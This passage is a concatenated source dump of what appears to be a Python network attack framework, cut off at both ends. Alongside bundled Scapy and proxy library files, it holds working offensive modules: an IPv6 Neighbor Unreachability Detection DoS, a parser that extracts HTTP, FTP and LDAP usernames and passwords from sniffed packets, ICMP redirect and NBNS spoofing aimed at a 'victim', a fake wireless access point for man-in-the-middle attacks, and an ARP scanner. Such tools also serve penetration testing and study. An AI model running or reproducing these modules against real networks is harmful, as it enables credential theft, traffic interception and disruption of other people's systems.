_LLMNR_IPv6_mcast_Addr = "FF02:0:0:0:0:0:1:3" 14 | _LLMNR_IPv4_mcast_addr = "224.0.0.252" 15 | 16 | class LLMNRQuery(Packet): 17 | name = "Link Local Multicast Node Resolution - Query" 18 | fields_desc = [ ShortField("id", 0), 19 | BitField("qr", 0, 1), 20 | BitEnumField("opcode", 0, 4, { 0:"QUERY" }), 21 | BitField("c", 0, 1), 22 | BitField("tc", 0, 2), 23 | BitField("z", 0, 4), 24 | BitEnumField("rcode", 0, 4, { 0:"ok" }), 25 | DNSRRCountField("qdcount", None, "qd"), 26 | DNSRRCountField("ancount", None, "an"), 27 | DNSRRCountField("nscount", None, "ns"), 28 | DNSRRCountField("arcount", None, "ar"), 29 | DNSQRField("qd", "qdcount"), 30 | DNSRRField("an", "ancount"), 31 | DNSRRField("ns", "nscount"), 32 | DNSRRField("ar", "arcount",0)] 33 | overload_fields = {UDP: {"sport": 5355, "dport": 5355 }} 34 | def hashret(self): 35 | return struct.pack("!H", self.id) 36 | 37 | class LLMNRResponse(LLMNRQuery): 38 | name = "Link Local Multicast Node Resolution - Response" 39 | qr = 1 40 | fields_desc = [] 41 | 42 | def answers(self, other): 43 | return (isinstance(other, LLMNRQuery) and 44 | self.id == other.id and 45 | self.qr == 1 and 46 | other.qr == 0) 47 | 48 | def _llmnr_dispatcher(x, *args, **kargs): 49 | cls = Raw 50 | if len(x) >= 3: 51 | if (ord(x[4]) & 0x80): # Response 52 | cls = LLMNRResponse 53 | else: # Query 54 | cls = LLMNRQuery 55 | return cls(x, *args, **kargs) 56 | 57 | bind_bottom_up(UDP, _llmnr_dispatcher, { "dport": 5355 }) 58 | bind_bottom_up(UDP, _llmnr_dispatcher, { "sport": 5355 }) 59 | 60 | # LLMNRQuery(id=RandShort(), qd=DNSQR(qname="vista."))) 61 | 62 | 63 | -------------------------------------------------------------------------------- /src/modules/dos/nud.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | from threading import Thread 3 | from dos import DoS 4 | import util 5 | 6 | 7 | class nud(DoS): 8 | """ Exploits a flaw in the Neighbor Unreachability Detection (NUD) mechanism 9 | in the NDP IPv6 suite. This will listen for unicast Neighbor Solicitations 10 | and respond, no matter if the dest node is alive or not. In the event that 11 | a node is down, or fake node entries are present in the system's cache, the 12 | host will continue to send packets because NUD has not had a chance to 13 | remediate the issue. 14 | 15 | Enabling a sniffer will allow you to view all sent data. 16 | """ 17 | def __init__(self): 18 | super(nud, self).__init__('IPv6 Neighbor Unreachability Detection DoS') 19 | self.running = False 20 | self.dump = False 21 | conf.verb = 0 22 | self.config.pop("target", None) 23 | self.info = """ 24 | Listens for Neighbor Solicitations and responds to them 25 | automatically. In the event that the destination node is 26 | dead, the packets destined for it will be null routed.""" 27 | 28 | def initialize(self): 29 | """initialize the NUD dos""" 30 | util.Msg('Starting NUD DoS listener...') 31 | self.running = True 32 | dthread = Thread(target=self.listener) 33 | dthread.start() 34 | return 'NuD DoS Listener' 35 | 36 | def handler(self, pkt): 37 | """Listen for neighbor solicitations""" 38 | if ICMPv6ND_NS in pkt: 39 | v6_type = pkt[ICMPv6ND_NS].type 40 | if v6_type is 135: 41 | # respond 42 | npkt = IPv6(dst=pkt[IPv6].src, src=pkt[IPv6].dst) 43 | npkt /= ICMPv6ND_NA() 44 | send(npkt, count=1) 45 | log_msg('Responded to %s' % pkt[IPv6].src) 46 | 47 | def stop_caller(self): 48 | """Sniffer callback""" 49 | if self.running: 50 | return True 51 | util.debug('NUDDos shutting down..') 52 | return False 53 | 54 | def listener(self): 55 | """listen for IPv6 packets""" 56 | try: 57 | while self.running: 58 | sniff(filter='ip6', store=0, prn=self.handler, 59 | stopper=self.stop_caller, stopperTimeout=3) 60 | except Exception, e: 61 | util.Error('%s' % e) 62 | 63 | def view(self): 64 | util.Msg('NUD DoS...') 65 | self.dump = True 66 | raw_input() 67 | self.dump = False 68 | return -------------------------------------------------------------------------------- /src/lib/libmproxy/contrib/jsbeautifier/unpackers/__init__.py: -------------------------------------------------------------------------------- 1 | # 2 | # General code for JSBeautifier unpackers infrastructure. See README.specs 3 | # written by Stefano Sanfilippo 4 | # 5 | 6 | """General code for JSBeautifier unpackers infrastructure.""" 7 | 8 | import pkgutil 9 | import re 10 | from jsbeautifier.unpackers import evalbased 11 | 12 | # NOTE: AT THE MOMENT, IT IS DEACTIVATED FOR YOUR SECURITY: it runs js! 13 | BLACKLIST = ['jsbeautifier.unpackers.evalbased'] 14 | 15 | class UnpackingError(Exception): 16 | """Badly packed source or general error. Argument is a 17 | meaningful description.""" 18 | pass 19 | 20 | def getunpackers(): 21 | """Scans the unpackers dir, finds unpackers and add them to UNPACKERS list. 22 | An unpacker will be loaded only if it is a valid python module (name must 23 | adhere to naming conventions) and it is not blacklisted (i.e. inserted 24 | into BLACKLIST.""" 25 | path = __path__ 26 | prefix = __name__ + '.' 27 | unpackers = [] 28 | interface = ['unpack', 'detect', 'PRIORITY'] 29 | for _importer, modname, _ispkg in pkgutil.iter_modules(path, prefix): 30 | if 'tests' not in modname and modname not in BLACKLIST: 31 | try: 32 | module = __import__(modname, fromlist=interface) 33 | except ImportError: 34 | raise UnpackingError('Bad unpacker: %s' % modname) 35 | else: 36 | unpackers.append(module) 37 | 38 | return sorted(unpackers, key = lambda mod: mod.PRIORITY) 39 | 40 | UNPACKERS = getunpackers() 41 | 42 | def run(source, evalcode=False): 43 | """Runs the applicable unpackers and return unpacked source as a string.""" 44 | for unpacker in [mod for mod in UNPACKERS if mod.detect(source)]: 45 | source = unpacker.unpack(source) 46 | if evalcode and evalbased.detect(source): 47 | source = evalbased.unpack(source) 48 | return source 49 | 50 | def filtercomments(source): 51 | """NOT USED: strips trailing comments and put them at the top.""" 52 | trailing_comments = [] 53 | comment = True 54 | 55 | while comment: 56 | if re.search(r'^\s*\/\*', source): 57 | comment = source[0, source.index('*/') + 2] 58 | elif re.search(r'^\s*\/\/', source): 59 | comment = re.search(r'^\s*\/\/', source).group(0) 60 | else: 61 | comment = None 62 | 63 | if comment: 64 | source = re.sub(r'^\s+', '', source[len(comment):]) 65 | trailing_comments.append(comment) 66 | 67 | return '\n'.join(trailing_comments) + source 68 | -------------------------------------------------------------------------------- /src/core/session_manager.py: -------------------------------------------------------------------------------- 1 | import stream 2 | import util 3 | from colors import color 4 | from os import system 5 | from os import path 6 | 7 | # 8 | # Module provides the front end for interacting with sessions 9 | # 10 | 11 | session_menu = ['Stop session', 'View session', 'Start session logger', 12 | 'Stop session logger'] 13 | 14 | 15 | def menu(): 16 | """Driver for the session management menu 17 | """ 18 | while True: 19 | stream.dump_sessions() 20 | choice = util.print_menu(session_menu) 21 | 22 | if choice == 0: 23 | break 24 | elif choice == 1: 25 | (module, number) = stream.get_session_input() 26 | if not module is None: 27 | stream.stop_session(module, number) 28 | elif choice == 2: 29 | (module, number) = stream.get_session_input() 30 | if not module is None: 31 | stream.view_session(module, number) 32 | elif choice == 3: 33 | try: 34 | display = color.B_YELLOW + '[' + color.B_GREEN + '!' + color.B_YELLOW + \ 35 | '] Enter file to log to' + color.B_WHITE + ' > ' + color.END 36 | file_path = raw_input(display) 37 | if file_path is None: 38 | return 39 | if util.does_file_exist(file_path) or path.islink(file_path): 40 | util.Error('File already exists.') 41 | return 42 | (module, number) = stream.get_session_input() 43 | if not module is None: 44 | display = color.B_YELLOW + '[' + color.B_GREEN + '!' + color.B_YELLOW + \ 45 | '] Log output from %s session %s to %s. Is this correct? ' + \ 46 | color.B_GREEN + '[' + color.B_YELLOW + 'Y' + color.B_GREEN + \ 47 | '/' + color.B_YELLOW + 'n' + color.B_GREEN + '] ' + \ 48 | color.B_WHITE + '> ' + color.END 49 | tmp = raw_input(display % (module, number, file_path)) 50 | if 'n' in tmp.lower(): 51 | return 52 | stream.toggle_log(module, number, file_path, True) 53 | except KeyboardInterrupt: 54 | return 55 | except Exception: 56 | util.Error('Error logging to given file') 57 | return 58 | elif choice == 4: 59 | (module, number) = stream.get_session_input() 60 | if not module is None: 61 | stream.toggle_log(module, number) 62 | elif choice == -1: 63 | pass 64 | else: 65 | system('clear') 66 | -------------------------------------------------------------------------------- /src/lib/scapy/arch/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | import sys,os,socket 8 | from scapy.error import * 9 | import scapy.config 10 | 11 | try: 12 | import Gnuplot 13 | GNUPLOT=1 14 | except ImportError: 15 | log_loading.info("Can't import python gnuplot wrapper . Won't be able to plot.") 16 | GNUPLOT=0 17 | 18 | try: 19 | import pyx 20 | PYX=1 21 | except ImportError: 22 | log_loading.info("Can't import PyX. Won't be able to use psdump() or pdfdump().") 23 | PYX=0 24 | 25 | 26 | def str2mac(s): 27 | return ("%02x:"*6)[:-1] % tuple(map(ord, s)) 28 | 29 | 30 | 31 | def get_if_addr(iff): 32 | return socket.inet_ntoa(get_if_raw_addr(iff)) 33 | 34 | def get_if_hwaddr(iff): 35 | addrfamily, mac = get_if_raw_hwaddr(iff) 36 | if addrfamily in [ARPHDR_ETHER,ARPHDR_LOOPBACK]: 37 | return str2mac(mac) 38 | else: 39 | raise Scapy_Exception("Unsupported address family (%i) for interface [%s]" % (addrfamily,iff)) 40 | 41 | 42 | LINUX=sys.platform.startswith("linux") 43 | OPENBSD=sys.platform.startswith("openbsd") 44 | FREEBSD=sys.platform.startswith("freebsd") 45 | NETBSD = sys.platform.startswith("netbsd") 46 | DARWIN=sys.platform.startswith("darwin") 47 | SOLARIS=sys.platform.startswith("sunos") 48 | WINDOWS=sys.platform.startswith("win32") 49 | 50 | X86_64 = not WINDOWS and (os.uname()[4] == 'x86_64') 51 | 52 | 53 | # Next step is to import following architecture specific functions: 54 | # def get_if_raw_hwaddr(iff) 55 | # def get_if_raw_addr(iff): 56 | # def get_if_list(): 57 | # def get_working_if(): 58 | # def attach_filter(s, filter): 59 | # def set_promisc(s,iff,val=1): 60 | # def read_routes(): 61 | # def get_if(iff,cmd): 62 | # def get_if_index(iff): 63 | 64 | 65 | 66 | if LINUX: 67 | from linux import * 68 | if scapy.config.conf.use_pcap or scapy.config.conf.use_dnet: 69 | from pcapdnet import * 70 | elif OPENBSD or FREEBSD or NETBSD or DARWIN: 71 | from bsd import * 72 | elif SOLARIS: 73 | from solaris import * 74 | elif WINDOWS: 75 | from windows import * 76 | 77 | if scapy.config.conf.iface is None: 78 | scapy.config.conf.iface = LOOPBACK_NAME 79 | 80 | 81 | def get_if_raw_addr6(iff): 82 | """ 83 | Returns the main global unicast address associated with provided 84 | interface, in network format. If no global address is found, None 85 | is returned. 86 | """ 87 | r = filter(lambda x: x[2] == iff and x[1] == IPV6_ADDR_GLOBAL, in6_getifaddr()) 88 | if len(r) == 0: 89 | return None 90 | else: 91 | r = r[0][0] 92 | return inet_pton(socket.AF_INET6, r) 93 | -------------------------------------------------------------------------------- /src/lib/scapy/layers/ntp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | import time 7 | from scapy.packet import * 8 | from scapy.fields import * 9 | from scapy.layers.inet import UDP 10 | 11 | 12 | # seconds between 01-01-1900 and 01-01-1970 13 | _NTP_BASETIME = 2208988800 14 | 15 | class TimeStampField(FixedPointField): 16 | def __init__(self, name, default): 17 | FixedPointField.__init__(self, name, default, 64, 32) 18 | 19 | def i2repr(self, pkt, val): 20 | if val is None: 21 | return "--" 22 | val = self.i2h(pkt,val) 23 | if val < _NTP_BASETIME: 24 | return val 25 | return time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime(val-_NTP_BASETIME)) 26 | 27 | def any2i(self, pkt, val): 28 | if type(val) is str: 29 | return int(time.mktime(time.strptime(val))) + _NTP_BASETIME + 3600 # XXX 30 | return FixedPointField.any2i(self,pkt,val) 31 | 32 | def i2m(self, pkt, val): 33 | if val is None: 34 | val = FixedPointField.any2i(self, pkt, time.time()+_NTP_BASETIME) 35 | return FixedPointField.i2m(self, pkt, val) 36 | 37 | 38 | 39 | class NTP(Packet): 40 | # RFC 1769 41 | name = "NTP" 42 | fields_desc = [ 43 | BitEnumField('leap', 0, 2, 44 | { 0: 'nowarning', 45 | 1: 'longminute', 46 | 2: 'shortminute', 47 | 3: 'notsync'}), 48 | BitField('version', 3, 3), 49 | BitEnumField('mode', 3, 3, 50 | { 0: 'reserved', 51 | 1: 'sym_active', 52 | 2: 'sym_passive', 53 | 3: 'client', 54 | 4: 'server', 55 | 5: 'broadcast', 56 | 6: 'control', 57 | 7: 'private'}), 58 | BitField('stratum', 2, 8), 59 | BitField('poll', 0xa, 8), ### XXX : it's a signed int 60 | BitField('precision', 0, 8), ### XXX : it's a signed int 61 | FixedPointField('delay', 0, size=32, frac_bits=16), 62 | FixedPointField('dispersion', 0, size=32, frac_bits=16), 63 | IPField('id', "127.0.0.1"), 64 | TimeStampField('ref', 0), 65 | TimeStampField('orig', None), # None means current time 66 | TimeStampField('recv', 0), 67 | TimeStampField('sent', None) 68 | ] 69 | def mysummary(self): 70 | return self.sprintf("NTP v%ir,NTP.version%, %NTP.mode%") 71 | 72 | 73 | bind_layers( UDP, NTP, dport=123, sport=123) 74 | -------------------------------------------------------------------------------- /src/modules/sniffer/password_parser.py: -------------------------------------------------------------------------------- 1 | import util 2 | from re import findall 3 | from base64 import b64decode 4 | from scapy.all import * 5 | 6 | """ Class houses all of the protocol parsing functions. 7 | Each parsing routine should return a tuple of the form: (username, password) 8 | """ 9 | 10 | 11 | def parse_ldap(pkt): 12 | """ Parse LDAP credentials; only supports simple (0) 13 | authentication right now. Scapy doesn't currently 14 | support LDAP packets, so we'll do this by hand. 15 | """ 16 | payload = pkt[TCP].payload 17 | pkt_layer = util.get_layer_bytes(str(payload)) 18 | 19 | usr, pswd = None, None 20 | if len(pkt_layer) > 0: 21 | if pkt_layer[4] == '01': 22 | # bind request 23 | usr, pswd = '', '' 24 | usr_len = int(pkt_layer[11]) 25 | for idx in xrange(usr_len): 26 | usr += pkt_layer[12 + idx].decode('hex') 27 | 28 | pw_len = int(pkt_layer[13 + usr_len]) 29 | for idx in xrange(pw_len): 30 | pswd += pkt_layer[14 + usr_len + idx].decode('hex') 31 | return (usr, pswd) 32 | 33 | 34 | def parse_http(pkt): 35 | """ Parse out the username/password from an HTTP request. 36 | This will also parse out any basic authorization requests. 37 | """ 38 | payload = pkt.getlayer(Raw).load 39 | usr, pswd = None, None 40 | if 'username' in payload or 'password' in payload: 41 | usr = re.search('username=(.*?)(&|$| )', payload) 42 | pswd = re.search('password=(.*?)(&|$| )', payload) 43 | if usr is not None: 44 | usr = usr.groups(0)[0] 45 | if pswd is not None: 46 | pswd = pswd.groups(0)[0] 47 | elif 'Authorization:' in payload: 48 | pw = re.search('Authorization: Basic (.*)', payload) 49 | if pw.groups(0) is not None: 50 | usr = b64decode(pw.groups(0)[0]) 51 | 52 | return (usr, pswd) 53 | 54 | 55 | def parse_ftp(pkt): 56 | """ Parse out the username or password from FTP 57 | """ 58 | payload = str(pkt.sprintf("%Raw.load%")) 59 | # strip control characters 60 | payload = payload[:-5] 61 | usr, pswd = None, None 62 | 63 | if 'USER' in payload: 64 | usr = findall("(?i)USER (.*)", payload)[0] 65 | elif 'PASS' in payload: 66 | pswd = findall("(?i)PASS (.*)", payload)[0] 67 | 68 | return (usr, pswd) 69 | 70 | 71 | def parse_pkt(pkt): 72 | """ Initialize parsing of the packet 73 | """ 74 | if pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 80 and pkt.haslayer(Raw): 75 | return parse_http(pkt) 76 | elif pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 21: 77 | return parse_ftp(pkt) 78 | elif pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 389: 79 | return parse_ldap(pkt) 80 | return (None, None) 81 | -------------------------------------------------------------------------------- /src/lib/libmproxy/encoding.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2012 Aldo Cortesi 2 | # 3 | # This program is free software: you can redistribute it and/or modify 4 | # it under the terms of the GNU General Public License as published by 5 | # the Free Software Foundation, either version 3 of the License, or 6 | # (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, 9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | # GNU General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program. If not, see . 15 | 16 | """ 17 | Utility functions for decoding response bodies. 18 | """ 19 | import cStringIO 20 | import gzip, zlib 21 | 22 | __ALL__ = ["ENCODINGS"] 23 | 24 | ENCODINGS = set(["identity", "gzip", "deflate"]) 25 | 26 | def decode(e, content): 27 | encoding_map = { 28 | "identity": identity, 29 | "gzip": decode_gzip, 30 | "deflate": decode_deflate, 31 | } 32 | if e not in encoding_map: 33 | return None 34 | return encoding_map[e](content) 35 | 36 | def encode(e, content): 37 | encoding_map = { 38 | "identity": identity, 39 | "gzip": encode_gzip, 40 | "deflate": encode_deflate, 41 | } 42 | if e not in encoding_map: 43 | return None 44 | return encoding_map[e](content) 45 | 46 | def identity(content): 47 | """ 48 | Returns content unchanged. Identity is the default value of 49 | Accept-Encoding headers. 50 | """ 51 | return content 52 | 53 | def decode_gzip(content): 54 | gfile = gzip.GzipFile(fileobj=cStringIO.StringIO(content)) 55 | try: 56 | return gfile.read() 57 | except (IOError, EOFError): 58 | return None 59 | 60 | def encode_gzip(content): 61 | s = cStringIO.StringIO() 62 | gf = gzip.GzipFile(fileobj=s, mode='wb') 63 | gf.write(content) 64 | gf.close() 65 | return s.getvalue() 66 | 67 | def decode_deflate(content): 68 | """ 69 | Returns decompressed data for DEFLATE. Some servers may respond with 70 | compressed data without a zlib header or checksum. An undocumented 71 | feature of zlib permits the lenient decompression of data missing both 72 | values. 73 | 74 | http://bugs.python.org/issue5784 75 | """ 76 | try: 77 | try: 78 | return zlib.decompress(content) 79 | except zlib.error: 80 | return zlib.decompress(content, -15) 81 | except zlib.error: 82 | return None 83 | 84 | def encode_deflate(content): 85 | """ 86 | Returns compressed content, always including zlib header and checksum. 87 | """ 88 | return zlib.compress(content) 89 | -------------------------------------------------------------------------------- /src/modules/poison/icmp.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | from poison import Poison 3 | from threading import Thread 4 | from zoption import Zoption 5 | import time 6 | import config 7 | import util 8 | 9 | 10 | class icmp(Poison): 11 | def __init__(self): 12 | super(icmp, self).__init__('ICMP Redirection') 13 | conf.verb = 0 14 | self.local = (config.get('ip_addr'), get_if_hwaddr(config.get('iface'))) 15 | self.victim = () 16 | self.target = () 17 | self.config.update({"victim_ip":Zoption(type = "ip", 18 | value = None, 19 | required = True, 20 | display = "Redirect host"), 21 | "target_ip":Zoption(type = "ip", 22 | value = None, 23 | required = True, 24 | display = "Redirect victim to"), 25 | "respoof":Zoption(type = "int", 26 | value = 15, 27 | required = False, 28 | display = "Interval (seconds) to send respoofed redirects") 29 | }) 30 | self.info = """ 31 | Send ICMP redirects to a victim. The victim system needs 32 | to be configured to allow ICMP redirects, which is not 33 | the default case. 34 | """ 35 | 36 | def initialize(self): 37 | """ initialize a poison 38 | """ 39 | util.Msg('Initializing ICMP poison...') 40 | self.victim = (self.config['victim_ip'].value, 41 | getmacbyip(self.config['victim_ip'].value)) 42 | self.target = (self.config['target_ip'].value, 43 | getmacbyip(self.config['target_ip'].value)) 44 | 45 | self.running = True 46 | thread = Thread(target=self.inject) 47 | thread.start() 48 | return self.victim[0] 49 | 50 | def inject(self): 51 | """ Send ICMP redirects to the victim 52 | """ 53 | # icmp redirect 54 | pkt = IP(src=self.target[0], dst=self.victim[0]) 55 | pkt /= ICMP(type=5, code=1, gw=self.local[0]) 56 | 57 | # fake UDP 58 | pkt /= IP(src=self.victim[0], dst=self.target[0]) 59 | pkt /= UDP() 60 | 61 | while self.running: 62 | send(pkt) 63 | time.sleep(self.config['respoof'].value) 64 | 65 | return self.victim[0] 66 | 67 | def shutdown(self): 68 | """ Shutdown ICMP spoofing 69 | """ 70 | if self.running: 71 | util.Msg("Shutting ICMP redirect down "\ 72 | "(this could take up to %s seconds)" % \ 73 | self.config['respoof'].value) 74 | self.running = False 75 | return True -------------------------------------------------------------------------------- /src/lib/scapy/layers/pflog.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.packet import * 7 | from scapy.fields import * 8 | from scapy.layers.inet import IP 9 | if conf.ipv6_enabled: 10 | from scapy.layers.inet6 import IPv6 11 | from scapy.config import conf 12 | 13 | class PFLog(Packet): 14 | name = "PFLog" 15 | # from OpenBSD src/sys/net/pfvar.h and src/sys/net/if_pflog.h 16 | fields_desc = [ ByteField("hdrlen", 0), 17 | ByteEnumField("addrfamily", 2, {socket.AF_INET: "IPv4", 18 | socket.AF_INET6: "IPv6"}), 19 | ByteEnumField("action", 1, {0: "pass", 1: "drop", 20 | 2: "scrub", 3: "no-scrub", 21 | 4: "nat", 5: "no-nat", 22 | 6: "binat", 7: "no-binat", 23 | 8: "rdr", 9: "no-rdr", 24 | 10: "syn-proxy-drop" }), 25 | ByteEnumField("reason", 0, {0: "match", 1: "bad-offset", 26 | 2: "fragment", 3: "short", 27 | 4: "normalize", 5: "memory", 28 | 6: "bad-timestamp", 29 | 7: "congestion", 30 | 8: "ip-options", 31 | 9: "proto-cksum", 32 | 10: "state-mismatch", 33 | 11: "state-insert", 34 | 12: "state-limit", 35 | 13: "src-limit", 36 | 14: "syn-proxy" }), 37 | StrFixedLenField("iface", "", 16), 38 | StrFixedLenField("ruleset", "", 16), 39 | SignedIntField("rulenumber", 0), 40 | SignedIntField("subrulenumber", 0), 41 | SignedIntField("uid", 0), 42 | IntField("pid", 0), 43 | SignedIntField("ruleuid", 0), 44 | IntField("rulepid", 0), 45 | ByteEnumField("direction", 255, {0: "inout", 1: "in", 46 | 2:"out", 255: "unknown"}), 47 | StrFixedLenField("pad", "\x00\x00\x00", 3 ) ] 48 | def mysummary(self): 49 | return self.sprintf("%PFLog.addrfamily% %PFLog.action% on %PFLog.iface% by rule %PFLog.rulenumber%") 50 | 51 | bind_layers(PFLog, IP, addrfamily=socket.AF_INET) 52 | if conf.ipv6_enabled: 53 | bind_layers(PFLog, IPv6, addrfamily=socket.AF_INET6) 54 | 55 | conf.l2types.register(117, PFLog) 56 | -------------------------------------------------------------------------------- /src/modules/services/access_point.py: -------------------------------------------------------------------------------- 1 | import util 2 | from time import sleep 3 | from threading import Thread 4 | from service import Service 5 | from zoption import Zoption 6 | 7 | 8 | class access_point(Service): 9 | def __init__(self): 10 | super(access_point, self).__init__('Access Point') 11 | self.mon_adapt = None 12 | del self.config["port"] 13 | self.config.update({"ap_essid":Zoption(type = "str", 14 | value = "zoopzop", 15 | required = False, 16 | display = "Spoofed AP name") 17 | }) 18 | self.info = """ 19 | Implements a fake wireless access point to execute 20 | client attacks or set up a wireless mitm that forwards 21 | traffic to another device. 22 | 23 | Passthru currently not working; todo. 24 | """ 25 | 26 | def initialize_bg(self): 27 | """Initialize in background thread""" 28 | if not util.check_program('airbase-ng'): 29 | util.Error('\'airbase-ng\' not found in local path.') 30 | return False 31 | 32 | util.Msg('Initializing access point..') 33 | thread = Thread(target=self.initialize) 34 | thread.start() 35 | 36 | sleep(2) 37 | if self.running: 38 | return True 39 | else: 40 | return False 41 | 42 | def initialize(self): 43 | """Initialize AP""" 44 | if not util.check_program('airbase-ng'): 45 | util.Error('\'airbase-ng\' not found in local path.') 46 | return False 47 | 48 | self.running = True 49 | ap_proc = None 50 | 51 | try: 52 | self.mon_adapt = util.get_monitor_adapter() 53 | if self.mon_adapt is None: 54 | self.mon_adapt = util.enable_monitor() 55 | 56 | if self.mon_adapt is None: 57 | util.Error('Could not find a wireless card in monitor mode') 58 | self.running = False 59 | return None 60 | 61 | airbase_cmd = [ 62 | 'airbase-ng', 63 | '--essid', self.config['ap_essid'].value, 64 | self.mon_adapt 65 | ] 66 | ap_proc = util.init_app(airbase_cmd, False) 67 | util.Msg('Access point %s running.' % \ 68 | self.config['ap_essid'].value) 69 | raw_input() # block 70 | except KeyboardInterrupt: 71 | self.running = False 72 | except Exception, er: 73 | util.Error('Error with wireless AP: %s' % er) 74 | finally: 75 | util.disable_monitor() 76 | util.kill_app(ap_proc) 77 | 78 | def cli(self, parser): 79 | """ establish CLI options 80 | """ 81 | parser.add_argument('--wap', help='Wireless access point', 82 | action='store_true', default=False, dest=self.which) 83 | -------------------------------------------------------------------------------- /src/modules/poison/nbns.py: -------------------------------------------------------------------------------- 1 | import re 2 | from threading import Thread 3 | from scapy.all import * 4 | from zoption import Zoption 5 | from poison import Poison 6 | import util 7 | import config 8 | 9 | 10 | class nbns(Poison): 11 | def __init__(self): 12 | super(nbns, self).__init__('NBNS Poison') 13 | conf.verb = 0 14 | self.local_mac = get_if_hwaddr(config.get('iface')) 15 | self.config.update({"regex_match":Zoption(type = "regex", 16 | value = None, 17 | required = True, 18 | display = "Match request regex"), 19 | "redirect":Zoption(type = "ip", 20 | value = None, 21 | required = True, 22 | display = "Redirect to") 23 | }) 24 | self.info = """ 25 | Implements NBNS spoofing. 26 | Requests are matched based on Python's regex parser. 27 | """ 28 | 29 | def handler(self, pkt): 30 | """Callback for packets""" 31 | if pkt.haslayer(NBNSQueryRequest): 32 | request = pkt[NBNSQueryRequest].getfieldval('QUESTION_NAME') 33 | ret = self.config['regex_match'].value.search(request.lower()) 34 | if ret is None: 35 | return 36 | 37 | if not ret.group(0) is None and pkt[Ether].dst != self.local_mac \ 38 | and pkt[IP].src != util.get_local_ip(config.get('iface')): 39 | trans_id = pkt[NBNSQueryRequest].getfieldval('NAME_TRN_ID') 40 | response = Ether(dst=pkt[Ether].src, src=self.local_mac) 41 | response /= IP(dst=pkt[IP].src) / UDP(sport=137, dport=137) 42 | response /= NBNSQueryResponse(NAME_TRN_ID=trans_id, 43 | RR_NAME=request, NB_ADDRESS=self.config['redirect'].value) 44 | del response[UDP].chksum # recalc checksum 45 | sendp(response) # layer 2 send for performance 46 | self.log_msg('Spoofing \'%s\' from %s' 47 | % (request.strip(), pkt[IP].src)) 48 | 49 | def initialize(self): 50 | """Initialize spoofer 51 | """ 52 | util.Msg('Starting NBNS spoofer...') 53 | sniffr = Thread(target=self.sniff_thread) 54 | sniffr.start() 55 | self.running = True 56 | return True 57 | 58 | def sniff_thread(self): 59 | """Sniff packets""" 60 | sniff(filter='udp and port 137', prn=self.handler, store=0, 61 | stopper=self.test_stop, stopperTimeout=3) 62 | 63 | def shutdown(self): 64 | """Shutdown sniffer""" 65 | util.Msg("Shutting down NBNS spoofer...") 66 | if self.running: 67 | self.running = False 68 | return True 69 | 70 | def session_view(self): 71 | """Override session viewer""" 72 | return '%s -> %s' % (self.config['regex_match'].getStr(), 73 | self.config['redirect'].value) 74 | -------------------------------------------------------------------------------- /src/modules/scanner/net_map.py: -------------------------------------------------------------------------------- 1 | import socket 2 | from datetime import datetime 3 | from util import Error 4 | from scapy.all import * 5 | from scanner import Scanner 6 | from zoption import Zoption 7 | 8 | 9 | class net_map(Scanner): 10 | def __init__(self): 11 | super(net_map, self).__init__('NetMap') 12 | self.available_hosts = {} 13 | self.config.update({"net_mask":Zoption(type = "ipmask", 14 | value = None, 15 | required = True, 16 | display = "Netmask to scan"), 17 | "fingerprint":Zoption(type = "bool", 18 | value = False, 19 | required = False, 20 | display = "Fingerprint the host") 21 | }) 22 | self.info = """ 23 | Performs an ARP scan of the local network. 24 | """ 25 | 26 | def initialize(self): 27 | self.scan_block() 28 | 29 | def scan_block(self): 30 | """ ARPing the local network 31 | """ 32 | net_mask = self.config['net_mask'].value 33 | conf.verb = 0 34 | print '[!] Beginning host scan with netmask %s...' % (net_mask) 35 | try: 36 | start = datetime.now() 37 | (ans, unans) = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=net_mask),timeout=1, inter=0.1,multi=True) 38 | elapsed = (datetime.now() - start).seconds 39 | print '[!] Scan of %s completed in %s seconds with %d hosts responding.'%(net_mask,elapsed,len(ans)) 40 | for s, r in ans: 41 | ip = r[ARP].getfieldval('psrc') 42 | mac = r[ARP].getfieldval('hwsrc') 43 | if self.config['fingerprint'].value: 44 | host = '' 45 | try: 46 | if hasattr(socket, 'setdefaulttimeout'): 47 | socket.setdefaulttimeout(3) 48 | host = socket.gethostbyaddr(ip)[0] 49 | except: 50 | host = '' 51 | print "\t%s : %s (%s)" % (mac, ip, host) 52 | self._dbhost(mac, ip, host) 53 | else: 54 | print '\t%s : %s' % (mac, ip) 55 | self._dbhost(mac, ip, '') 56 | self.available_hosts[mac] = ip 57 | except Exception: 58 | Error('Error with net mask. Cannot scan given block.') 59 | return 60 | print '\n' 61 | 62 | def view(self): 63 | """ Dump previous scan results 64 | """ 65 | print '\n\t\033[32m[!] Available hosts in range %s:\033[0m' \ 66 | % self.config['net_mask'].value 67 | for mac in self.available_hosts.keys(): 68 | print '\t%s : %s' % (mac, self.available_hosts[mac]) 69 | 70 | def cli(self, parser): 71 | """ Add CLI options 72 | """ 73 | parser.add_argument('-s', help='Network scanner', 74 | action='store_true', dest=self.which) 75 | -------------------------------------------------------------------------------- /src/lib/libmproxy/contrib/jsbeautifier/unpackers/myobfuscate.py: -------------------------------------------------------------------------------- 1 | # 2 | # deobfuscator for scripts messed up with myobfuscate.com 3 | # by Einar 